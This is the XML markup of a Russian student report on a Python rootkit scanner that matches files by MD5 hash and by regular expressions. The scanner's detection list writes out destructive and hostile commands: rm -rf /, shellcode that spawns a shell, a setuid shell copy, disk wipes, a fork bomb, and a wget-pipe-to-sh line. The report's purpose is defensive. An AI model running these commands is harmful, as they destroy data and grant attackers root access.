          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63874" w:rsidRPr="00C957A9" w:rsidRDefault="00B63874" w:rsidP="00B63874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t>Сканирование файлов, задействованных в процессах по</w:t>
      </w:r>
      <w:r w:rsidR="0036371F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> определенными </w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -адресами </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824E48" w:rsidRPr="00824E48" w:rsidRDefault="00824E48" w:rsidP="00134EAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E3DA2" w:rsidRDefault="00134EAD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ходе проверки программы мы убедились, что она успешно обнаруживает файлы, содержащие в себе программный код внесенных нами в используемую базу данных руткитов. </w:t>
      </w:r>
      <w:r w:rsidR="00602CE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Также программа находит файлы, </w:t>
      </w:r>
      <w:r w:rsidR="00602CE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>содержащие в себе код, подходящий под описанные нами выше вредоносные команды (поиск осуществляется с использованием регулярных выражений).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0036371F" w:rsidRDefault="0036371F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сканирование файлов задействованных в процессах</w:t>
      </w:r>
      <w:r w:rsidR="00C83C17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, которые установили взаимодействие с сетью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E3DA2" w:rsidRPr="00501249" w:rsidRDefault="0054669C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ешения поставленной задачи можно считать приемлемым, так как оно не слишком велико (субъективная оценка) и сравнимо с временем работы приведенный выше инстр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chkrootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00501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khunt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501249" w:rsidRPr="00501249">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00501249" w:rsidRDefault="00501249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лного сканирования продолжительн</w:t>
      </w:r>
      <w:r w:rsidR="00D2123B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ость работы сканера составляет 10</w:t>
      </w:r>
      <w:r w:rsidR="007D6D52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> минут. При проведении тестирования описанных выше утилит (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00501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khunter</w:t>
      </w:r>
      <w:r w:rsidR="007D6D52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) были получены результаты 10-16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01249" w:rsidRPr="00501249" w:rsidRDefault="00501249" w:rsidP="007E3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, найденные с помощью данной утилиты и утилит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="005012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khunter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> аналогичны.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B14701" w:rsidRDefault="00B14701" w:rsidP="007E3DA2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9" w:name="_Toc451125777"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вывод</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="0054669C" w:rsidRDefault="0054669C" w:rsidP="0054669C"/>
    <w:p w:rsidR="00780FCE" w:rsidRDefault="00780FCE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писанном сканере реализован один из методов поиска руткитов, обычно используемые при написании антивирусного программного обеспечения - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00780FCE" w:rsidRDefault="00780FCE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турный.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00780FCE" w:rsidRDefault="00780FCE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ей сигнатурного метода является занесение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80FCE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хэшей файлов известных руткитов в базу данный и срав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80FCE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 xml:space="preserve">хешэй проверяемых файлов с имеющимися в базе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00792C27" w:rsidRDefault="00792C27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данного метода является отсутствие ложных срабатываний (в отличие от эвристического), недостатком – необходимость постоянно обновлять базу данных руткитов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00792C27" w:rsidRPr="00780FCE" w:rsidRDefault="00792C27" w:rsidP="0054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ер справляется с поставленными задачами за допустимое время.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E3DA2" w:rsidRPr="00C957A9" w:rsidRDefault="007E3DA2" w:rsidP="007E3DA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC7ED6" w:rsidRPr="00C957A9" w:rsidRDefault="00CC7ED6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59014F" w:rsidP="005901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451125778"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Приложение 1. Исходные тексты программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00E60BD9" w:rsidRPr="00C957A9" w:rsidRDefault="00E60BD9" w:rsidP="00E60BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0059014F" w:rsidRDefault="00E60BD9" w:rsidP="0059014F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В данном разделе приведены полные исходные коды описываемой утилиты и вспомогательных скриптов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. Тестирование на работоспособность проводилось </w:t>
      </w:r>
      <w:r w:rsidR="009C041E" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="009C041E" w:rsidRPr="00C957A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9C041E" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – дистрибутиве семейства </w:t>
      </w:r>
      <w:r w:rsidR="00C5792E" w:rsidRPr="00C957A9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 14.04 </w:t>
      </w:r>
      <w:r w:rsidR="00C5792E" w:rsidRPr="00C957A9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 </w:t>
      </w:r>
      <w:r w:rsidR="00C32712" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">с 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использованием интерпретатора языка </w:t>
      </w:r>
      <w:r w:rsidR="00C5792E" w:rsidRPr="00C957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5792E" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> версии 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2591D" w:rsidRPr="00C957A9" w:rsidRDefault="00F2591D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EA2617" w:rsidP="00BF2916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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл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scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – основной файл, проверяет выбранную директорию на наличие вредоносного кода, содержит в себе обращение к базе данных (для сравнения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Pr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5 файлов руткитов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!/usr/bin/env python3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 os, sys, re, time, hashlib, sqlite3, subprocess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 os.path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gexes = [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\Wrm \-rf /\W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\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x2d\x63\x00cp \-p /bin/sh /tmp/\.beyond; chmod 4755 /tmp/\.beyond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mkfs\\.ext[1234]? /dev/sd[abcd]?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:\(\)\{\:\|:\&amp;\};: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\w+ &gt; /dev/sda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.{0, 10000} &gt; /dev/sd[a-d]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wget (http(s?)|ftp)://[\w\-/\._]+ -O- \| sh")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re.compile(rb"mv /home/\w/\* /dev/null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ab/>
        <w:t>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hitelist = [os.path.abspath("./RootkitScripts"), "/var/lib/dpkg/info"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lectlist = ["/", "/home", "/opt", "/bin", "/usr/bin"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128-bit base-16 strings (length = 32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n = sqlite3.connect("db.sqlite3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ith con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cur = con.cursor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cur.execute("SELECT md5, name FROM malware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#md5s = ["0123456789abcdef0123456789abcdef",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#        "fedcba9876543210fedcba9876543210"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md5s = {r[0]: r[1] for r in cur.fetchall()}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 os.geteuid() != 0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ys.exit("Please run this as root. If you don't trust the file, read the sources at %s" % os.path.abspath(__file__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ns = input("Do you want to scan (y/N)?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 ans != "y": sys.exit("Scanning aborted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Choose what do you want to scan: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 (i, s) in enumerate(selectlist)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int("%2d --- %s" % (i + 1, s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hoice = -1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hile choice &lt; 0 or choice &gt; len(selectlist)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try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choice = int(input("Enter your choice between 1 and %d or 0 to scan by IP: " % len(selectlist)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except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choice = -1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if choice:        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elected = [selectlist[choice - 1]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lse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s_process = subprocess.Popen(["ss", "-n", "-l", "-p", "-u", "-t"], stdout=subprocess.PIPE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grep_process = subprocess.Popen(["grep", "users:"], stdin=ss_process.stdout, stdout=subprocess.PIPE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s_process.stdout.close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output = grep_process.communicate()[0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plitted = output.split(b"\n")[:-1] # we need to throw out the last entry because it is empty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info = [s.split() for s in splitted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# Filter the ips further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info = [i for i in info if i[1] == b"LISTEN"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ips = [i[4] for i in info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oc = [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for i in info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 = i[6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ident = b"pid="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index = p.find(ident) + len(ident) # where the PID starts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end = p.find(b",", index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id = int(p[index:end]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roc.append(pid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selected = list({"/proc/%s" % p for p in proc}) # create list from set to avoid duplicates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int("Selected directories: %s" % selected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Scanning started"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art = time.perf_counter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leno = scanned = 0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licious = []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 sel in selected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for dirpath, dirnames, filenames in os.walk(sel)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c = 0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for w in whitelist: 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if os.path.commonpath([dirpath, w]) == w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</w:t>
      </w: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 = 1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if c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    continue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for filename in (f for f in filenames)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fileno += 1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fullfilename = os.path.join(dirpath, filename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if fileno % 500 == 0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print("Checking file %d..." % fileno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try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mode = os.stat(fullfilename).st_mode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except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print("Exception occurred while retrieving info for file %d : %s" % (fileno, fullfilename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if mode &amp; 73: # 111 base-8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try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with open(fullfilename, "rb") as content_file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content = content_file.read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hasher = hashlib.md5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</w:t>
      </w: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hasher.update(content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digest = hasher.hexdigest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if digest in md5s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print("The file %d : %s is suspected to contain %s due to MD5 hash sum %s" % (fileno, fullfilename, md5s[digest], digest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malicious.append(fullfilename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continue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for r in regexes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                        if r.search(content)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    print("The file %d : %s is suspected to contain malicious commands" % (fileno, fullfilename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    malicious.append(fullfilename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    break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scanned += 1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except Exception as e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print("Exception occurred while working with file %d : %s (%s)" % (fileno, fullfilename, e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inish = time.perf_counter(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Scanning finished. Total time: %s seconds" % (finish - start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=" * 50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FILES: total %d, scanned %d" % (fileno, scanned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*" * 50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("LIST OF MALICIOUS FILES (%d)" % len(malicious))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 m in malicious:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5E5C" w:rsidRPr="002C5E5C" w:rsidRDefault="002C5E5C" w:rsidP="002C5E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C5E5C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int(m)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F655E" w:rsidRPr="002C5E5C" w:rsidRDefault="007F655E" w:rsidP="007F655E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7D7B3E" w:rsidRPr="00480667" w:rsidRDefault="007D7B3E" w:rsidP="007F655E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A48C3" w:rsidRDefault="001A48C3" w:rsidP="000B2280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл 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rk</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2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bd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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py</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – вспомогательный файл, необходим для перевода файлов </w:t>
      </w:r>
      <w:r w:rsidR="000E2F4C" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">известных </w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">руткитов в вид </w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidR="00125C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5-хэ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">шей и последующего их занесения в базу данных </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004513E5" w:rsidRPr="00C957A9" w:rsidRDefault="004513E5" w:rsidP="000B2280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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>#!/usr/bin/env python3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>import os, hashlib, sqlite3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>hasher = hashlib.md5(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>con = sqlite3.connect("db.sqlite3"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>cur = con.cursor(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>for dirpath, dirnames, filenames in os.walk("RootkitScripts"):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for filename in (f for f in filenames):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    fullfilename = os.path.join(dirpath, filename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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        with open(fullfilename, "rb") as content_file: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        content = content_file.read(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        hasher.update(content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        digest = hasher.hexdigest(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        present = list(cur.execute("SELECT * FROM malware WHERE md5 = '%s'" % digest)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        info = (digest, fullfilename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        if present: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            print("Digest %s for %s already present" % info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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130525">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00130525">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>continue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        print("Inserting digest %s for %s..." % info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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130525">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            cur.execute("INSERT INTO malware (md5, name) VALUES ('%s', '%s')" % info)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00044CF2" w:rsidRPr="00130525" w:rsidRDefault="00044CF2" w:rsidP="00BF5C25">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130525">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00130525">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>con.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E34A5" w:rsidRPr="00480667" w:rsidRDefault="009E34A5" w:rsidP="00BF5C25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00122786" w:rsidRPr="00130525" w:rsidRDefault="00122786" w:rsidP="0059014F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00122786" w:rsidRPr="00480667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59014F" w:rsidP="005901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451125779"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Приложение 2. Результаты тестирования сканнера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="0059014F" w:rsidRPr="00C957A9" w:rsidRDefault="0059014F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Default="00FD0217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канера проводилось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FD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D0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14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Pr="00FD02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02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FD021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5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD0217" w:rsidRDefault="00FD0217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олного сканирования системы среднее вре</w:t>
      </w:r>
      <w:r w:rsidR="005222E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мя работы скрипта составляет 13</w:t>
      </w:r>
      <w:r w:rsidR="005F6E3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,8 мин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4307">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При выборе сканирования отдельны</w:t>
      </w:r>
      <w:r w:rsidR="005F6E3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>х директорий среднее время – 10,9</w:t>
      </w:r>
      <w:r w:rsidR="00CF4307">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с</w:t>
      </w:r>
      <w:r w:rsidR="005F6E3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>екунд</w:t>
      </w:r>
      <w:r w:rsidR="00B10C53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidR="00CF43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4307" w:rsidRDefault="00CF4307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роисходило ложное срабатывание н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CF43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 последствие был занесен в «белый» список.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A72224" w:rsidRDefault="00A72224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в директ</w:t>
      </w:r>
      <w:r w:rsidR="00523E3A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ории были помещены файлы руткитов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, скачанные по сети. Источник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="005E5CD4">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://packetstormsecurity.com/files/tags/rootkit/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A72224" w:rsidRDefault="00D867AA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данных файлах прошло успешно – файлы были </w:t>
      </w:r>
      <w:r w:rsidR="00523E3A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выявлены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C310F3" w:rsidRDefault="00C310F3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ртинках представлены результаты тестирования сканера на реальных файлах руткитов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C310F3" w:rsidRDefault="00C310F3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тестирование было проведено в директории </w:t>
      </w:r>
      <w:r w:rsidRPr="00C310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C310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айлы вредоносного программного обеспечения успешно выявлены, также выведена информация о причине срабатывание: совпали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C310F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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>хэш-суммы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F6E3C" w:rsidRDefault="007048F1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F6E3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выведена информация о времени работы скрипка (10 секунд) и количестве проверенных файлов. В конце выведен список подозрительных фалов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F6E3C" w:rsidRPr="00C310F3" w:rsidRDefault="005F6E3C" w:rsidP="0059014F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
